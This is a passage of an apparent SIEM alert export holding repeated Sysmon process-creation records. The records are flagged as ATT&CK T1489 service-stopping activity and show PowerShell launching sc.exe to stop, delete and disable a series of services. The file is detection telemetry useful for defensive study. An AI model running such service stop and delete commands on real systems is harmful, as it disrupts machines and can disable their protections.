12:52:38.291"",""processGuid"":""{df9fc3d3-b416-5ecf-0000-00108efb3000}"",""processId"":""6148"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config ClipBooks Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:06.474",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:38.230 +ProcessGuid: {df9fc3d3-b416-5ecf-0000-001084f93000} +ProcessId: 7392 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHasdelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:38.234072800Z"",""eventRecordID"":""3921"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:38.230\r\nProcessGuid: {df9fc3d3-b416-5ecf-0000-001084f93000}\r\nProcessId: 7392\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:38.230"",""processGuid"":""{df9fc3d3-b416-5ecf-0000-001084f93000}"",""processId"":""7392"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHasdelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:06.390",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:38.150 +ProcessGuid: {df9fc3d3-b416-5ecf-0000-0010d8f63000} +ProcessId: 2920 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHasdadelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdadelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:38.156859700Z"",""eventRecordID"":""3918"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:38.150\r\nProcessGuid: {df9fc3d3-b416-5ecf-0000-0010d8f63000}\r\nProcessId: 2920\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdadelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:38.150"",""processGuid"":""{df9fc3d3-b416-5ecf-0000-0010d8f63000}"",""processId"":""2920"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHasdadelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:06.343",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:38.090 +ProcessGuid: {df9fc3d3-b416-5ecf-0000-0010faf43000} +ProcessId: 5584 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete WissssssnHelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete WissssssnHelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:38.106311700Z"",""eventRecordID"":""3916"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:38.090\r\nProcessGuid: {df9fc3d3-b416-5ecf-0000-0010faf43000}\r\nProcessId: 5584\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete WissssssnHelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:38.090"",""processGuid"":""{df9fc3d3-b416-5ecf-0000-0010faf43000}"",""processId"":""5584"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete WissssssnHelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:06.334",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:38.064 +ProcessGuid: {df9fc3d3-b416-5ecf-0000-001098f33000} +ProcessId: 380 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WissssssnHelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WissssssnHelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:38.066829500Z"",""eventRecordID"":""3915"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:38.064\r\nProcessGuid: {df9fc3d3-b416-5ecf-0000-001098f33000}\r\nProcessId: 380\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WissssssnHelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:38.064"",""processGuid"":""{df9fc3d3-b416-5ecf-0000-001098f33000}"",""processId"":""380"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WissssssnHelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:06.251",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:37.983 +ProcessGuid: {df9fc3d3-b415-5ecf-0000-0010ebf03000} +ProcessId: 1408 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop "".Net CLR"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \"".Net CLR\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:37.987394000Z"",""eventRecordID"":""3912"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:37.983\r\nProcessGuid: {df9fc3d3-b415-5ecf-0000-0010ebf03000}\r\nProcessId: 1408\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \"".Net CLR\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:37.983"",""processGuid"":""{df9fc3d3-b415-5ecf-0000-0010ebf03000}"",""processId"":""1408"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\"".Net CLR\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:06.193",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:37.869 +ProcessGuid: {df9fc3d3-b415-5ecf-0000-001060ee3000} +ProcessId: 3592 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SuperProServer +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SuperProServer",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:37.879762200Z"",""eventRecordID"":""3909"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:37.869\r\nProcessGuid: {df9fc3d3-b415-5ecf-0000-001060ee3000}\r\nProcessId: 3592\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SuperProServer\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:37.869"",""processGuid"":""{df9fc3d3-b415-5ecf-0000-001060ee3000}"",""processId"":""3592"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SuperProServer"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 